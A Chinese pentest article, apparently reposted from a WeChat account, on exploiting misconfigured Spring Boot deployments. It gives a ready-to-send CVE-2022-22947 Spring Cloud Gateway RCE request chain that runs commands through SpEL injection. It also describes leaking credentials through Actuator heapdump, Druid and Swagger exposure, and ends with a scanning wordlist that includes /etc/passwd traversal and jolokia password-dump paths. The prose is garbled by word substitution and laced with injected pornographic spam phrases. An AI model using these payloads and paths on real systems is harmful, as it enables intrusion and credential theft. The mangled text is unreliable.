免责声明自拍偷拍 亚洲色图

由于传播、应用本公众号所提供的信息而形成的任何径直或者转折的后果及耗损，均由使用者本东说念主认真，公众号及作家不为此承担任何拖累，一朝形成后果请自行承担！如有侵权烦呈报知，我们会立即删除并致歉。谢谢！

图片自拍偷拍 亚洲色图

宽饶关切本公众号，永远推送技艺著述

序言

跟着互联网的不休发展，面前的Web确立发展越来越快，更多的企业聘用使用框架快速搭建我方的系统。在繁密的框架中，Spring Boot因为肤浅和高效的优点，受到了繁密确立者的可爱。

先来先容一下Spring Boot，Spring Boot是由Pivotal团队提供的一套开源框架，不错简化spring应用的创建及部署。它提供了丰富的Spring模块化赈济，不错匡助确立者更罢休快捷地构建出企业级应用。Spring Boot通过自动配置功能，捏造了复杂性，同期赈济基于JVM的多种开源框架，不错裁汰确立时辰，使确立愈加肤浅和高效。

使用搜索引擎检察，也不错看见SpringBoot是如斯的火热。

图片

常见罅隙书册Spring Boot Actuator未授权探访罅隙应用

关于这个actuator驯顺大部分师父齐不目生，Actuator 是 Spring Boot 提供的管事监控和措置中间件。当 Spring Boot 应用顺序开动时，它会自动将多个端点注册到路由程度中。当这些端点存在配置不妥的时候，就有可能导致一些系统信息透露、 RCE 等安全问题。

Spring Boot 1.x版块端点在根URL下注册

Spring Boot 2.x版块端点移动到/actuator/旅途

参考官网文档，其中常用的端点功能形色如下：

Actuator 禁用了大部分端点。因此，默许情况下只消 /health 和 /info 这两个端点可用。

/auditevents 列出了与安全审计关联的事件，如用户登录/刊出。此外，还不错把柄 Principal 或类型等字段进行过滤。

/beans 复返 BeanFactory 中扫数可用的 Bean。与 /auditevents 不同，它不赈济过滤。

/conditions（之前称为 /autoconfig）会生成关联自动配置条目的讲明。

/configprops 允许得到扫数 @ConfigurationProperties Bean。

/env 复返面前环境属性（Environment Properties），也不错检索单个属性。

/flyway 提供了关联 Flyway 数据库转移的珍贵信息。

/health 汇总了应用的健康景况。

/heapdump 会构建并返恢复用所用 JVM 的 Heap Dump自拍偷拍 亚洲色图。

/info 复返一般信息。它可能是自界说数据、构建信息或最新提交的珍贵信息。

/liquibase 的活动近似于 /flyway，但针对的是 Liquibase。

/logfile 复返庸俗应用日记。

/loggers 大概查询和修改应用的日记级别。

/metrics 珍贵先容了应用的想法。这可能包括通用想法和自界说想法。

/prometheus 复返的想法与前一个近似，但现象化后可与 Prometheus 管事器一说念使用。

/scheduledtasks 提供了应用中每个筹画（定时）任务的珍贵信息。

/sessions 列出了 HTTP Session，前提是正在使用 Spring Session。

/shutdown 不错优雅地关闭应用。

/threaddump 会 dump 底层 JVM 的线程信息。

其中当heapdump、env、threaddump等端点存在未授权探访时，我们不错从中得到到管事器存在的明锐信息，包括OSS秘钥、数据库蚁集密码、redis蚁集密码、配置环境等，导致系统信息透露以至丢失权限。

案例

这是某次测试历程中发现有在的heapdump透露，从中发现数据库密码、redis密码以及公众号appid和appsecret，并末端公众号接受。

图片

图片

图片

Druid配置不妥

严格来说这个应该不算SpringBoot的罅隙，仅仅在配置历程中莫得作念好权限散伙，或者存在弱口令导致。

当druid未配置鉴权时，我们不错径直得到druid配置信息。

探访 url/xxxx/druid/basic.json

图片

当存在弱口令时，我们亦然不错投入后台，检察可能存在的session等，得到相应系统权限。

图片

Spring Cloud Gateway RCE罅隙

参考自博客：

CVE-2022-22947：Spring Cloud Gateway RCE罅隙分析以及复现_cve-2022-22947罅隙复现-CSDN博客https://blog.csdn.net/qq_50808416/article/details/130677837

由于Spring Cloud Gateway亦然一种微管事的应用，是以也不错让Actuator对它进行监控，本罅隙即是通过Actuator操作gateway接口列表来末端费事履行号令

当我们检察存在gateway接口时，不错通过构造坏心路由，从而末端rec。

创建路由

 POST /actuator/gateway/routes/test HTTP/1.1 Host: 192.168.2.131:8080 Accept-Encoding: gzip， deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML， like Gecko) Chrome/109.0.5414.120 Safari/537.36 Connection: close Content-Type: application/json Content-Length: 331 { 'id': 'test'， 'filters': [ { 'name': 'AddResponseHeader'， 'args': { 'value': '#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\'whoami\'}).getInputStream()))}'， 'name': 'result' } } ]， 'uri': 'http://example.com:80'， 'order': 0 }

刷新路由

 POST /actuator/gateway/refresh HTTP/1.1 Host: 192.168.2.131:8080 Connection: close Content-Type: application/x-www-form-urlencoded

探访创建的新路由得到履行的散伙

披露履行了whoami的号令

GET /actuator/gateway/routes/test HTTP/1.1 Host: 192.168.2.131:8080 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML， like Gecko) Chrome/109.0.5414.120 Safari/537.36 Accept: text/html，application/xhtml+xml，application/xml;q=0.9，image/avif，image/webp，image/apng，*/*;q=0.8，application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip， deflate Accept-Language: zh-CN，zh;q=0.9 Connection: close

图片

Swagger未授权探访

swagger即是一个在你写接口的时候自动帮你生成接口文档的东西，只消你着力它的措施并写一些接口的解释即可。

当配置不妥时会存在接口文档透露，若是存在权限措置不妥，会形成越权罅隙，信息透露等。

图片

常见目次回来

以下是SpringBoot常用的一下旅途，在扫描SpringBoot时不错达到一本万利的成果

亚洲在线香蕉一级视频

//#/wallboard/ /swagger-ui.html/Swagger/ui/index/acl/article?id=66/acm/actuator/actuator/#/wallboard/actuator/acm/actuator/admin/swagger-ui.html/actuator/api-docs/actuator/api.html/actuator/api/index.html/actuator/api/swagger-ui.html/actuator/api/v2/api-docs/actuator/api/v2/swagger.json/actuator/archaius/actuator/article?id=${7*7}/actuator/article?id=66/actuator/auditLog/actuator/auditevents/actuator/auditevents/actuator/intergrationgraph/actuator/autoconfig/actuator/beans/actuator/beans/actuator/jolokia/actuator/beans1/actuator/caches/actuator/caches/actuator/refresh/actuator/caches/cache/actuator/channels/actuator/conditions/actuator/conditions/actuator/jolokia/list/actuator/conditions1/actuator/configprops/actuator/configurationMetadata/actuator/distv2/index.html/actuator/docs/actuator/druid/login.html/actuator/dubbo-provider/distv2/index.html/actuator/dump/actuator/env/actuator/env/actuator/liquibase/actuator/env/java.home/actuator/env/spring.jmx.enabled/actuator/env/system/actuator/events/actuator/exportRegisteredServices/actuator/features/actuator/features/actuator/peripheral/swagger-ui.html/actuator/flyway/actuator/gateway/gateway/actuator/h2-console/actuator/health/actuator/health//actuator/health/actuator/loggers/actuator/healthcheck/actuator/heapdump/actuator/httptrace/actuator/httptrace/actuator/mappings/actuator/hystrix.stream/actuator/hystrix.stream/*/actuator/swagger/actuator/info/actuator/info/actuator/metrics/actuator/integrationgraph/actuator/intergrationgraph/actuator/jolokia/actuator/jolokia/*/actuator/static/swagger.json/actuator/jolokia/list/actuator/liquibase/actuator/logfile/actuator/logfile/actuator/sw/swagger-ui.html/actuator/loggers/actuator/loggers//actuator/loggingConfig/actuator/management/heapdump/actuator/mappings/actuator/mappings            /actuator/mappings/actuator/monitor/conditions/actuator/metrics/actuator/metrics            /actuator/metrics//actuator/metrics/actuator/monitor/env/actuator/monitor/auditevents/actuator/monitor/conditions/actuator/monitor/env/actuator/monitor/loggers/actuator/monitor/mappings/actuator/monitor/scheduledtasks/actuator/monitor/threaddump/actuator/peripheral/swagger-ui.html/actuator/peripheral/v2/api-docs/actuator/prometheus/actuator/prometheus/actuator/swagger-dubbo/api-docs/actuator/refresh/actuator/refresh/actuator/peripheral/v2/api-docs/actuator/registeredServices/actuator/releaseAttributes/actuator/resolveAttributes/actuator/restart/actuator/scheduledtasks/actuator/scheduledtasks/actuator/monitor/mappings/actuator/sentinel/actuator/service-registry/actuator/prometheus/actuator/sessions/actuator/sessions//actuator/sessions/actuator/swagger-ui.html/actuator/shutdown/actuator/spring-security-oauth-resource/swagger-ui.html/actuator/spring-security-rest/api/swagger-ui.html/actuator/springWebflow/actuator/sso/actuator/ssoSessions/actuator/static/swagger.json/actuator/statistics/actuator/status/actuator/sw/swagger-ui.html/actuator/swagger/actuator/swagger-dubbo/api-docs/actuator/swagger-resourcesce/actuator/swagger-ui/actuator/swagger-ui.html/actuator/swagger-ui/index.html/actuator/swagger/codes/actuator/swagger/index.html/actuator/swagger/static/index.html/actuator/system//actuator/system/env/actuator/system/mappings/actuator/system/showOsInfo/actuator/system/showProperties/actuator/template/swagger-ui.html/actuator/threaddump/actuator/threaddump/actuator/monitor/scheduledtasks/actuator/tra/actuator/trace/actuator/user/swagger-ui.html/admin/swagger-ui.html/api/api-docs/api-docs/swagger.json/api.html/api/api-docs/api/apidocs/api/doc/api/index.html/api/swagger/api/swagger-resources/api/swagger-ui/api/swagger-ui.html/api/swagger-ui.json/api/swagger.json/api/swagger//api/swagger/ui/api/swaggerui/api/v1//api/v1/api-docs/api/v1/apidocs/api/v1/login/api/v1/swagger/api/v1/swagger-resources/api/v1/swagger-ui/api/v1/swagger-ui.html/api/v1/swagger-ui.json/api/v1/swagger.json/api/v1/swagger//api/v2/api/v2/api-docs/api/v2/apidocs/api/v2/login/api/v2/swagger/api/v2/swagger-resources/api/v2/swagger-ui/api/v2/swagger-ui.html/api/v2/swagger-ui.json/api/v2/swagger.json/api/v2/swagger//api/v3/apidocs/apidocs/swagger.json/article?id=${7*7}/article?id=66/auditevents/autoconfig/beans/beans1/caches/channels/clients/clients/actuator/system/showOsInfo/clients/all/actuator/tra/clients/saveOrUpdate/actuator/trace/cloudfoundryapplication/conditions/conditions1/configprops/distv2/index.html/doc.html/docs/docs//druid/*/actuator/swagger/codes/druid/api.html/druid/basic.json/druid/datasource.html/druid/index.html/druid/login.html/druid/spring.html/druid/sql.html/druid/wall.html/druid/webapp.html/druid/websession.html/druid/weburi.html/dubbo-provider/distv2/index.html/dump/entity/all/env/env//env/(name)/env/java.home/env/spring/env/spring.jmx.enabled/env/{name}/error/actuator/monitor/threaddump/eureka/eureka/*/actuator/service-registry/features/flyway/gateway/actuator/gateway/actuator/auditevents/gateway/actuator/beans/gateway/actuator/conditions/gateway/actuator/configprops/gateway/actuator/env/gateway/actuator/health/gateway/actuator/heapdump/gateway/actuator/httptrace/gateway/actuator/hystrix.stream/gateway/actuator/info/gateway/actuator/jolokia/gateway/actuator/logfile/gateway/actuator/loggers/gateway/actuator/mappings/gateway/actuator/metrics/gateway/actuator/scheduledtasks/gateway/actuator/swagger-ui.html/gateway/actuator/threaddump/gateway/actuator/trace/get/graphql/h2-console/health/health//heapdump/heapdump.json/httptrace/hystrix/hystrix.stream/info/intergrationgraph/jolokia/jolokia/exec/org.springframework.cloud.context.environment:name=environmentManager，type=EnvironmentManager/getProperty/spring.datasource.password/jolokia/exec/org.springframework.cloud.context.environment:name=environmentManager，type=EnvironmentManager/getProperty/spring.datasource.url/jolokia/list/lastn/actuator/sessions/libs/swaggerui/liquibase/list/log/view?filename=/etc/passwd&base=../../../../../../../../../..//log/view?filename=/windows/win.ini&base=../../../../../../../../../..//logfile/loggers/login/admin/swagger-ui.html/manage/log/view?filename=/etc/passwd&base=../../../../../../../../../..//manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../..//management/heapdump/mappings/metrics/metrics//metrics/mem/metrics/{name}/monitor/monitor/auditevents/monitor/beans/monitor/conditions/monitor/configprops/monitor/env/monitor/health/monitor/heapdump/monitor/httptrace/monitor/hystrix.stream/monitor/info/monitor/jolokia/monitor/loggers/monitor/mappings/monitor/metrics/monitor/scheduledtasks/monitor/threaddump/oauth/authorize/actuator/swagger/index.html/oauth/check_token/actuator/swagger/static/index.html/oauth/client/token/api-docs/oauth/confirm_access/actuator/system//oauth/error/actuator/system/env/oauth/get/token/api.html/oauth/refresh/token/api/doc/oauth/remove/token/api/index.html/oauth/token/actuator/system/mappings/oauth/token/list/api/swagger/oauth/user/token/api/swagger-resources/oauth/userinfo/api/swagger-ui.html/peripheral/swagger-ui.html/peripheral/v2/api-docs/prometheus/redis/keysSize/api/swagger/ui/redis/memoryInfo/api/swaggerui/refresh/restart/scheduledtasks/services/services/1/services/api/v2/api-docs/services/findAlls/api/v1/api-docs/services/findOnes/api/v1/login/services/granted/api/v1/swagger-resources/services/saveOrUpdate/api/v1/swagger-ui.html/sessions/shutdown/spring-security-oauth-resource/swagger-ui.html/spring-security-rest/api/swagger-ui.html/static/swagger.json/sw/swagger-ui.html/swagger/swagger-dubbo/api-docs/swagger-resources/swagger-resources/actuator/shutdown/swagger-resources/configuration/security/swagger-resources/configuration/security/actuator/spring-security-oauth-resource/swagger-ui.html/swagger-resources/configuration/ui/swagger-resources/configuration/ui/actuator/spring-security-rest/api/swagger-ui.html/swagger-ui/swagger-ui.html/swagger-ui.html#/swagger-ui.html/api/v2/swagger.json/swagger-ui.json/swagger-ui/html/swagger-ui/index.html/swagger-ui/swagger.json/swagger.json/swagger.yml/swagger//swagger/codes/swagger/index.html/swagger/static/index.html/swagger/swagger-ui.html/swagger/ui/swagger/v1/swagger.json/swagger/v2/swagger.json/system//system/druid/index.html/system/druid/login.html/system/druid/websession.html/system/env/system/mappings/system/showOsInfo/system/showProperties/template/swagger-ui.html/threaddump/trace/trace//uc/env/user/swagger-ui.html/v1.1/swagger-ui.html/v1.2/swagger-ui.html/v1.3/swagger-ui.html/v1.4/swagger-ui.html/v1.5/swagger-ui.html/v1.6/swagger-ui.html/v1.7/swagger-ui.html/v1.8/swagger-ui.html/v1.9/swagger-ui.html/v1/agent/self/actuator/system/showProperties/v1/api-docs/v1/catalog/service/app/v1/catalog/services/actuator/threaddump/v1/swagger.json/v2.0/swagger-ui.html/v2.1/swagger-ui.html/v2.2/swagger-ui.html/v2.3/swagger-ui.html/v2/api-docs/v2/api-docs?group=swagger接口文档/v2/swagger.json/v3/api-docs/validata/code/version/webpage/system/druid/index.html/webpage/system/druid/login.html/webpage/system/druid/websession.html/actuator/gateway/routes/actuator/get/gateway/routes/new_route/actuator/gateway/routes/new_route/new_route/actuator/gateway/refresh/gateway/refresh/actuator/gateway/globalfilters/actuator/gateway/routefilters/actuator/gatewayroutes/1/actuator/nacos/actuator/nacos-config/actuator/swagger-resourcesce/actuator/nacos-discovery/actuator/swagger-ui/actuator/nacosconfig/actuator/nacos/v1/cs/configs/actuator/nacos/v1/cs/configs?dataId=Misplaced/actuator/nacos/v1/ns/instance/actuator/nacos/v1/ns/instance?serviceName=springboot2-nacos-discovery/actuator/nacos/v2/cs/configs/actuator/nacos/v2/cs/configs?dataId=Misplaced/actuator/nacos/v2/ns/instance/actuator/nacos/v2/ns/instance?serviceName=springboot2-nacos-discovery/actuator/nacos/v1/service/list?pageSize=123&groupname=default_group&encoding=utf-8/actuator/nacos/v2/service/list?pageSize=123&groupname=default_group&encoding=utf-8/nacos/nacos/v1/cs/configs/nacos/v1/cs/configs?dataId=Misplaced/nacos/v1/ns/instance/nacos/v1/ns/instance?serviceName=springboot2-nacos-discovery/nacos/v2/cs/configs/nacos/v2/cs/configs?dataId=Misplaced/nacos/v2/ns/instance/nacos/v2/ns/instance?serviceName=springboot2-nacos-discovery/nacos/v1/service/list?pageSize=123&groupname=default_group&encoding=utf-8/nacos/v2/service/list?pageSize=123&groupname=default_group&encoding=utf-8/v1/cs/configs/v1/cs/configs?dataId=Misplaced/v1/ns/instance/v1/ns/instance?serviceName=springboot2-nacos-discovery/v2/cs/configs/v2/cs/configs?dataId=Misplaced/v2/ns/instance/v2/ns/instance?serviceName=springboot2-nacos-discovery/v1/service/list?pageSize=123&groupname=default_group&encoding=utf-8/v2/service/list?pageSize=123&groupname=default_group&encoding=utf-8/nacos/v3/cs/configs/nacos/v3/cs/configs?dataId=Misplaced/nacos/v3/ns/instance/nacos/v3/ns/instance?serviceName=springboot2-nacos-discovery/nacos/v3/service/list?pageSize=123&groupname=default_group&encoding=utf-8/v3/cs/configs/v3/cs/configs?dataId=Misplaced/v3/ns/instance/v3/ns/instance?serviceName=springboot2-nacos-discovery/v3/service/list?pageSize=123&groupname=default_group&encoding=utf-8/actuator/archaius/actuator/nacosdiscovery/actuator/configprops/actuator/nacos/actuator/health/nacos/actuator/heapdump/actuator/loggers/nacos/actuator/loggers/actuator/metrics/nacos/env/nacos/get?serviceName=springboot2-nacos-discovery/metrics/nacos/webjars/**/actuator/nacosconfig/actuator/nacos/config

图片

图片

本站仅提供存储管事，扫数施行均由用户发布，如发现无益或侵权施行，请点击举报。